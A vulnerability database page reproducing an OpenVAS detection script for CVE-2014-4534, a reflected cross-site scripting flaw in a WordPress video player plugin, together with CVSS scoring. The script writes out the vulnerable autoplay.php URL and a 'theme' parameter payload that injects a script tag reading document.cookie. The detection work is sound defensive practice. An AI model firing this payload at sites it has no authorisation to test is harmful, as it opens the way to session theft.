Lucene search

K
openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310804674
HistoryJul 10, 2014 - 12:00 a.m.

WordPress HTML5 Video Player with Playlist plugin Multiple XSS Vulnerabilities

2014-07-1000:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
26

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.2 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

49.8%

WordPress HTML5 Video Player with Playlist Plugin is prone to multiple cross site scripting vulnerabilities.

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.804674");
  script_version("2023-10-27T05:05:28+0000");
  script_cve_id("CVE-2014-4534");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2014-07-10 14:09:51 +0530 (Thu, 10 Jul 2014)");
  script_name("WordPress HTML5 Video Player with Playlist plugin Multiple XSS Vulnerabilities");

  script_tag(name:"summary", value:"WordPress HTML5 Video Player with Playlist Plugin is prone to multiple cross site scripting vulnerabilities.");
  script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request and check whether it is able to read
cookie or not.");
  script_tag(name:"insight", value:"Input passed via the 'theme' and 'playlistmod' HTTP GET parameters to autoplay.php
script is not properly sanitised before returning to the user.");
  script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary HTML and
script code in a user's browser session in the context of an affected site.");
  script_tag(name:"affected", value:"WordPress HTML5 Video Player with Playlist Plugin version 2.4.0 and earlier");
  script_tag(name:"solution", value:"Update to WordPress HTML5 Video Player with Playlist Plugin version 2.50 or
later.");
  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"http://codevigilant.com/disclosure/wp-plugin-html5-video-player-with-playlist-a3-cross-site-scripting-xss");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/68360");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_mandatory_keys("wordpress/http/detected");
  script_require_ports("Services/www", 80);
  script_xref(name:"URL", value:"http://wordpress.org/plugins/html5-video-player-with-playlist/");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = dir + '/wp-content/plugins/html5-video-player-with-playlist/videopl' +
            'ayer/autoplay.php?theme="><script>alert(document.cookie)</script>';

if(http_vuln_check(port:port, url:url, check_header:TRUE,
   pattern:"<script>alert\(document\.cookie\)</script>",
   extra_check:">HTML5 VIDEO PLAYER<"))
{
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.2 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

49.8%

Related for OPENVAS:1361412562310804674